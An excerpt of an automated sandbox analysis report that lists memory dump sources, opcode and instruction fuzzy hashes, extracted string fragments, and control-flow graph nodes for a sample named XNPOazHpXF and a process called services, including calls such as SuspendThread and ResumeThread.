                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 8d59ef940f2ff1390753c2cc2df5c3f0bc49b4deb08525dd4c4a366f12d27f3d
                                                                • Instruction ID: 25b6870aebc8b9b167fe67039714bc588eca13bc2fd5df277f2429f3ed14ae7a
                                                                • Opcode Fuzzy Hash: 8d59ef940f2ff1390753c2cc2df5c3f0bc49b4deb08525dd4c4a366f12d27f3d
                                                                • Instruction Fuzzy Hash: 8801DBB1D4D68A8EE702FB64D8042EABBB0FF82310F040676D901DB2D2CB382214C789
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 14536fca1f33b8c647bc5e8206aad668550b14580c2e5c0fdfcc768c6f476dd4
                                                                • Instruction ID: f22fb4c34cd5df4a3edf5c233920121a06794c4822fb2958e5ecec7cf5b4e2e1
                                                                • Opcode Fuzzy Hash: 14536fca1f33b8c647bc5e8206aad668550b14580c2e5c0fdfcc768c6f476dd4
                                                                • Instruction Fuzzy Hash: 8501A87090894D9FDF84EF58C448AAE7BF0FF68345F00056AE419D3250DB30E590CB80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: d4176b172a92791afadfa68584453320fbcc02c519bddf1f29bb33a61e984357
                                                                • Instruction ID: c2e2b812d4c44390218fad1c90c43650a57bd4d4357a12b68708005102b0757b
                                                                • Opcode Fuzzy Hash: d4176b172a92791afadfa68584453320fbcc02c519bddf1f29bb33a61e984357
                                                                • Instruction Fuzzy Hash: CA01E43092868DCFCB84EF18D885AA97BE0FF58304F040166E849D3250D734E960CB81
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 63d19bb5c36f73d5ff15bee9b54583d362b3a4d64946519479ac5010cf2c9334
                                                                • Instruction ID: ede556b488143d1b5bc89f080902c9b5abee7b82b405839869c912b23114b184
                                                                • Opcode Fuzzy Hash: 63d19bb5c36f73d5ff15bee9b54583d362b3a4d64946519479ac5010cf2c9334
                                                                • Instruction Fuzzy Hash: B0F0623184E3C99FD722EF7089565E57FA4AF43244B1800FAE4458B0A2D66D5616C761
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: f5782376a14c1ca9f350fc53a517664e50ac4fbf88ee4fbabfe5fa87e8f244b3
                                                                • Instruction ID: 678ed9bb2ea565e3943d2727042857844c350aa4be551468c8c033abee4cc2ce
                                                                • Opcode Fuzzy Hash: f5782376a14c1ca9f350fc53a517664e50ac4fbf88ee4fbabfe5fa87e8f244b3
                                                                • Instruction Fuzzy Hash: 5AF0BB7490895CCFCF55EF98C894AACBBB1FF68345F10019DC00AEB251C630A841DF00
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                • Instruction ID: 29da9ab3e3621f55c026e5c541d3b753d46ac60d7af7fbf71df87d3a2c267692
                                                                • Opcode Fuzzy Hash: 24a143d68eda1a2dddb435c6d4210e29b7dc6ac9e2ad97ba99279c220c490a4a
                                                                • Instruction Fuzzy Hash: 7BF0D47490A998DFCF55EBA8C85AE99BBB0FF68300F1001DDD04ADB262CA319845CF40
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: c5d48ee350b63896b462a989aa40031aa0f6b8c48f8fd4422c10e4405d7da408
                                                                • Instruction ID: 0ac5f6f7292b6e82acbb7380fcd3a4e63c293c959f23143e2295d982ce1fe3ae
                                                                • Opcode Fuzzy Hash: c5d48ee350b63896b462a989aa40031aa0f6b8c48f8fd4422c10e4405d7da408
                                                                • Instruction Fuzzy Hash: F1E04F3681E2C98FE771FF108A560EC7F61BF51380F5801E7D509471D2EB696A189643
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 49e564d1729df9311648f3358d49fef3efb7496483c132e70508d52c999d8079
                                                                • Instruction ID: e3a80d735fff68c8dff522ed84a279281a031df2195cd3f7e948e1eb31201213
                                                                • Opcode Fuzzy Hash: 49e564d1729df9311648f3358d49fef3efb7496483c132e70508d52c999d8079
                                                                • Instruction Fuzzy Hash: BEE0EC30A0981D9ED771EB18DC543AAB671EF84301F1042F5900E96299CE352E868B80
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction ID: 257950247b19507d603f3444a53f00012563ea463f4218fa658a39c8151ac4d2
                                                                • Opcode Fuzzy Hash: 4b325eaacfe3e71f739a7a297d16ced70d129d28754c306d5ec5bc38144b417d
                                                                • Instruction Fuzzy Hash: 5ED01214A0D6D7CDF2397FC18070E3EA1D06F05781E22483EC16F818C1CE1D7601AE01
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction ID: 58f5180c06c67a949dcfe7f39bd44abea5061375aa129419e7db65b443bea11d
                                                                • Opcode Fuzzy Hash: 0078daf39e87aa0426dccabd76b4d788d610aa2f2f9ed6bf8e1ea0b22f85d295
                                                                • Instruction Fuzzy Hash: 5BD01270A1C5D38DF33A7F41853833E66A19F513C1E60003ED09F4A8C6CD2CB801661A
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2148004654.00007FF849620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849620000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff849620000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction ID: 637081ded260ab0185f178d8be119af1f28134a5f97684c05d420111f9e832d9
                                                                • Opcode Fuzzy Hash: 7d4c10f2c5c14c22a7e8cb2fc87a3e521df53a417e4f8777c23ce06f731aa2dc
                                                                • Instruction Fuzzy Hash: 17C04C14F0D2D39FE6317BB4585193926901F0B288B150971D51A8A2C3D85C78846A95
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: $!$"$#$$$%$&$'$($)$*$+$,$-$.$/$0$1$2$3$4$5$6$7$8$9$:$;$<$=$>$?$@$A$B$C$D$E$F$G$H$I$J$K$L$M$N$O$P$P~N$P~N$P~N$Q$R$S$T$U$V$W$X$Y$Z$[$\$]$^$_$`$a$b$c$d$e$f$g$h$i$j$k$l$m$n$o$p$q$r$s$t$u$v$w$x$y$z${$|$}$~$hty$hty$hty
                                                                • API String ID: 0-269381984
                                                                • Opcode ID: 43f3edb788e06496a9a2c65fa3add34625278db72b2baa5253a39444bb1c495f
                                                                • Instruction ID: 833468dba25da39772ab892b91e457af1040356da0b4c795455b338666846ccf
                                                                • Opcode Fuzzy Hash: 43f3edb788e06496a9a2c65fa3add34625278db72b2baa5253a39444bb1c495f
                                                                • Instruction Fuzzy Hash: 2E43DD70A155198FEB94EB14C899BAAB7B2FF48304F5041F9D40EA7292DF396E81CF44
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: D;I$ F;I$0D;I$0F;I$@D;I$@F;I$PD;I$PE;I$PF;I$`D;I$`E;I$`F;I$pD;I$pE;I$E;I
                                                                • API String ID: 0-399666217
                                                                • Opcode ID: d319f4da021ab77225e8a773053483196d18830467118c7b67e13c8663ea5534
                                                                • Instruction ID: c32ab26287e0922b46d675854f7be4c86e238820b4acf832d4230a8bd07bcac3
                                                                • Opcode Fuzzy Hash: d319f4da021ab77225e8a773053483196d18830467118c7b67e13c8663ea5534
                                                                • Instruction Fuzzy Hash: 22F1E922D0E6D29FE752AF78A8951E57F70FF1375871902F7C1844E087DA2CB8058399
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (m;I$(s;I$(t;I$(v;I$8p;I$Pl;I$Pn;I$pm;I$ps;I$x;I
                                                                • API String ID: 0-1754061288
                                                                • Opcode ID: 926eada36f80819fdc375e86dabc15034a6108980b6144b5de8758793aab25ff
                                                                • Instruction ID: 2201bcf44662b7037afd710deb66cd0ef76d0108846f6505edd01382d64a7254
                                                                • Opcode Fuzzy Hash: 926eada36f80819fdc375e86dabc15034a6108980b6144b5de8758793aab25ff
                                                                • Instruction Fuzzy Hash: 27613826E0EAC28FF7669E386854135BFA4FF5369870902FAC1444F4CBC428ED05C386
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2141556603.00007FF8490C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff8490c0000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 2e68063de4f975bcd349b975f09eb5cfb9f2955fb0687614ccf9a6670ccde3ce
                                                                • Instruction ID: 05feb54023bb1020ed93a8c5be108c112a3931447e7319954194653292e89f9a
                                                                • Opcode Fuzzy Hash: 2e68063de4f975bcd349b975f09eb5cfb9f2955fb0687614ccf9a6670ccde3ce
                                                                • Instruction Fuzzy Hash: 30E1DA22D0E6D29FF352AF7CA8511E67FB4FF5266870902B7C1884B19BD92CA805C3D5
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2139918697.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f20000_XNPOazHpXF.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: c9$!k9$"s9$#{9
                                                                • API String ID: 0-1692736845
                                                                • Opcode ID: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
                                                                • Instruction ID: 0681076a377dcda6742e77cbd2865407bc82f9de8890ac9bb63ac41a2e4d4c9f
                                                                • Opcode Fuzzy Hash: 8eb83324625cd40c4f579d185c5d7fcd0bd0c7a3cd5ab0727e1d0e96d320d8d6
                                                                • Instruction Fuzzy Hash: 88414D17A2F562AAE15137BDB4412EEABA4EF812BDF484777E14C8D0C34E0C648582FD

                                                                Execution Graph

                                                                Execution Coverage:2.9%
                                                                Dynamic/Decrypted Code Coverage:75%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:12
                                                                Total number of Limit Nodes:0
                                                                execution_graph 38660 7ff8490f0915 38661 7ff8490f092f GetFileAttributesW 38660->38661 38663 7ff8490f09f5 38661->38663 38672 7ff8490eea60 38673 7ff8490eea6a ResumeThread 38672->38673 38675 7ff8490eeb74 38673->38675 38664 7ff8490ed1fd 38665 7ff8490ed20b SuspendThread 38664->38665 38667 7ff8490ed2e4 38665->38667 38668 7ff8490eebc9 38669 7ff8490eebd7 CloseHandle 38668->38669 38671 7ff8490eecb4 38669->38671

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8^eI$`6yI
                                                                • API String ID: 0-485061400
                                                                • Opcode ID: d9f5119209c60e807cca12063a038eae71cbae1e9e490ffbb53535f2c5ec265b
                                                                • Instruction ID: 514f9233769498c85dc8a221ac4e7f2a12e24eba43cf26550b0975d575180e6f
                                                                • Opcode Fuzzy Hash: d9f5119209c60e807cca12063a038eae71cbae1e9e490ffbb53535f2c5ec265b
                                                                • Instruction Fuzzy Hash: 98128932D0F6D69FE361BF68A8550F6BBA0EF027A8B1841B7D08C8E093DD1DA4458755

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: PnI$\^H
                                                                • API String ID: 0-1942866696
                                                                • Opcode ID: 672b67ffdb1bfaab55bac3e930bd305dfdd73e41de3b7063f001619c232f9097
                                                                • Instruction ID: a72fd4ce3b1d20c9761bfdd7b3c1097584fec9091a501b1ab61d86db86407727
                                                                • Opcode Fuzzy Hash: 672b67ffdb1bfaab55bac3e930bd305dfdd73e41de3b7063f001619c232f9097
                                                                • Instruction Fuzzy Hash: C7A1B231A0DA8A8FD755EFA888546F87BE1FF55340F0942BAC04DC7292DF2CA8458755

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 235 7ff8498856dd-7ff84988571c call 7ff8498833f8 239 7ff849885721-7ff849885763 call 7ff8498840c0 235->239 242 7ff849885769-7ff849885773 239->242 243 7ff849884171-7ff84988417b 239->243 242->243 244 7ff84988417d-7ff849886e68 243->244 245 7ff84988419b-7ff849886e0b 243->245 244->243 255 7ff849886e6e-7ff849886e78 244->255 249 7ff849886e0d 245->249 250 7ff849886e12-7ff849886e2b 245->250 249->250 250->243 255->243
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3406849623.00007FF849880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849880000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849880000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 9$U
                                                                • API String ID: 0-1041384400
                                                                • Opcode ID: 2e60e180ea308e3ed6006cba7f8a331fe931d21955b82598f5cbc91e99ef1f84
                                                                • Instruction ID: d1defc7d9114072dec559bffd0e1906751bf6ef702aefd5f84ed69b6a86ef070
                                                                • Opcode Fuzzy Hash: 2e60e180ea308e3ed6006cba7f8a331fe931d21955b82598f5cbc91e99ef1f84
                                                                • Instruction Fuzzy Hash: BD111F70A186598FDB64EF18CC957A8B7F0FF54741F1041EAD40DA3295CB786AC18F51

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 621785fa1d55edeb32a1c5c6e1dab191ab84b5da4087d5467e7329dec1adf831
                                                                • Instruction ID: 5fb37a3bea7b48bd01be3dd8aed5f8ac0ac7ce6549e3a37df22172b4426877a0
                                                                • Opcode Fuzzy Hash: 621785fa1d55edeb32a1c5c6e1dab191ab84b5da4087d5467e7329dec1adf831
                                                                • Instruction Fuzzy Hash: 1F12E530D0CA8A9FE75AEFA8C5586B9BBA0FF54340F14457AD04EC76C2CB38A851CB55

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 379 7ff8490eea60-7ff8490eea99 381 7ff8490eea9c-7ff8490eeb72 ResumeThread 379->381 382 7ff8490eea9b 379->382 386 7ff8490eeb74 381->386 387 7ff8490eeb7a-7ff8490eebc4 381->387 382->381 386->387
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: ResumeThread
                                                                • String ID:
                                                                • API String ID: 947044025-0
                                                                • Opcode ID: d6cb49f854a0ba6331f65617a233b8d807e2f940bcbcd8ab0b3d2d0566b4ec2d
                                                                • Instruction ID: f4327770449030271b7fcef18b77ed37d242e57b5de2b4a1914164e429f08b58
                                                                • Opcode Fuzzy Hash: d6cb49f854a0ba6331f65617a233b8d807e2f940bcbcd8ab0b3d2d0566b4ec2d
                                                                • Instruction Fuzzy Hash: DF516B7090D78C8FDB55DFA8D858AE9BFF0EF56310F0441ABD049D7292CA79A846CB11

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 390 7ff8490ed1fd-7ff8490ed209 391 7ff8490ed214-7ff8490ed2e2 SuspendThread 390->391 392 7ff8490ed20b-7ff8490ed213 390->392 396 7ff8490ed2e4 391->396 397 7ff8490ed2ea-7ff8490ed334 391->397 392->391 396->397
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: SuspendThread
                                                                • String ID:
                                                                • API String ID: 3178671153-0
                                                                • Opcode ID: 1981cf82fe473d6a803d0de64416cbc082ad66a097689def8ea5865b8cdb3bdb
                                                                • Instruction ID: ce808da6a20ded8eb86cf402fd7232875a81277a133f74109a575bcedd26da9d
                                                                • Opcode Fuzzy Hash: 1981cf82fe473d6a803d0de64416cbc082ad66a097689def8ea5865b8cdb3bdb
                                                                • Instruction Fuzzy Hash: 09413970D0864C8FDF99DFA8D885AADBBF0FB5A310F10416ED049E7252DA74A885CB45

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 400 7ff8490f0915-7ff8490f09f3 GetFileAttributesW 404 7ff8490f09f5 400->404 405 7ff8490f09fb-7ff8490f0a39 400->405 404->405
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: AttributesFile
                                                                • String ID:
                                                                • API String ID: 3188754299-0
                                                                • Opcode ID: 09323c10fb7705f82498ee9a8ca1f713012cd699ac8726d38573709255522602
                                                                • Instruction ID: 6812e8a03d032f79ad5e4bcbbc0093b2d6c205ce0dec473d86e8c5180619bbff
                                                                • Opcode Fuzzy Hash: 09323c10fb7705f82498ee9a8ca1f713012cd699ac8726d38573709255522602
                                                                • Instruction Fuzzy Hash: FA411970A0864C8FDB98EF98D889BEDBBF0FB59310F10416ED049E7252DA74A885CF40

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: HtdI
                                                                • API String ID: 0-579680469
                                                                • Opcode ID: 08b92cf74ae63247e91bf3e4322d4a792b2034c663190dc63066454da4fa581b
                                                                • Instruction ID: 3d1d062c0144d18b82b2115d397adc93558f21b047a81feb9294436cb3ea9a19
                                                                • Opcode Fuzzy Hash: 08b92cf74ae63247e91bf3e4322d4a792b2034c663190dc63066454da4fa581b
                                                                • Instruction Fuzzy Hash: 64A1C431D1CA8A8FE778EF98A4515B9B7A0FF45390F24057ED44EC7282DF29B8468742

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: H{wI
                                                                • API String ID: 0-1212038778
                                                                • Opcode ID: 8f5653e2c506e77c29b5b5be3d98c378bc7e7e9f34deef5e2d51f358c0de14a6
                                                                • Instruction ID: 8ccf1a0abd1e04347966e19303ed3599732532549d7c74af99fcab6241805efd
                                                                • Opcode Fuzzy Hash: 8f5653e2c506e77c29b5b5be3d98c378bc7e7e9f34deef5e2d51f358c0de14a6
                                                                • Instruction Fuzzy Hash: 23712631D1DA8E9FE764EFA8D8466FD7BB0FF44390F14027AD009D7292EB2868418794

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: X;bI
                                                                • API String ID: 0-1594360369
                                                                • Opcode ID: c9382d4336db8a802f3616b86dcec632772ff2bbbbdc8463c5b7a364e57a1d07
                                                                • Instruction ID: ce341ccd5ec6c7db7588620d13884924db1560efbce012fba9c7898374481a13
                                                                • Opcode Fuzzy Hash: c9382d4336db8a802f3616b86dcec632772ff2bbbbdc8463c5b7a364e57a1d07
                                                                • Instruction Fuzzy Hash: BA71C131D1D69A9EEB69EFA488546BD7BB0EF55380F1404BAD00EC7183EF286841CB56

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UAWA
                                                                • API String ID: 0-1492024814
                                                                • Opcode ID: 327f64d1a2dbe00397d415c5b47e624a3191acedbda5f21c88acd96ec139364e
                                                                • Instruction ID: 85bce73ecee592204a294b23b39a543c21511dc846adbc7604961d857e3286a3
                                                                • Opcode Fuzzy Hash: 327f64d1a2dbe00397d415c5b47e624a3191acedbda5f21c88acd96ec139364e
                                                                • Instruction Fuzzy Hash: 5151CE30D0D6899FDB69EF688458BB97BA0FF09340F0141FED80DD7292EA386984CB41

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 7ddda44452cd04d1eea5e122c31aa36475aecd14291e1b92afdb62876bd8a47b
                                                                • Instruction ID: 1df2bc9ae0b98a7f3b26b6a135ecffcde160fdd7dea6b6e6935ccb475ee3249f
                                                                • Opcode Fuzzy Hash: 7ddda44452cd04d1eea5e122c31aa36475aecd14291e1b92afdb62876bd8a47b
                                                                • Instruction Fuzzy Hash: 87513A30D0D68A9FDB69EFA8C4955BDB7B1FF58340F2040BAC40AE7286CB386945CB55

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: UAWA
                                                                • API String ID: 0-1492024814
                                                                • Opcode ID: 917cb971cdd1ccd89a9c47ac419425a66eea64db16638b393b799044c3b47fd6
                                                                • Instruction ID: 979114078ac63b1d32fc3999a0f5e3bbc71c16d37aa729c8980d1460533f0255
                                                                • Opcode Fuzzy Hash: 917cb971cdd1ccd89a9c47ac419425a66eea64db16638b393b799044c3b47fd6
                                                                • Instruction Fuzzy Hash: CC51D23051A6958FEB99DF18C0D05B03BA1FF45350B9155BDCC5ACB68BE778E882CB40

                                                                Control-flow Graph

                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3389996687.00007FF8490E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490E0000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff8490e0000_services.jbxd
                                                                Similarity
                                                                • API ID: CloseHandle
                                                                • String ID:
                                                                • API String ID: 2962429428-0
                                                                • Opcode ID: dc04d157e80a02df412590f13c957b56871ffb163c0296df18420263c6d048ed
                                                                • Instruction ID: 7e9c2212a794a3f5902a8ecf0f21e67ae87e4e52dddef9d2707fca7cc632cb71
                                                                • Opcode Fuzzy Hash: dc04d157e80a02df412590f13c957b56871ffb163c0296df18420263c6d048ed
                                                                • Instruction Fuzzy Hash: A5416C70D0865C8FDF58DFA8D889BEDBBF0FB56310F10416AD049E7292DA34A885CB01

                                                                Control-flow Graph

                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000007.00000002.3400427677.00007FF849640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849640000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_7_2_7ff849640000_services.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID: 0-3916222277
                                                                • Opcode ID: 7cabb05a43e454675f94b09f5ee82bf025b29e6b9bcf102675ddc7761526d340
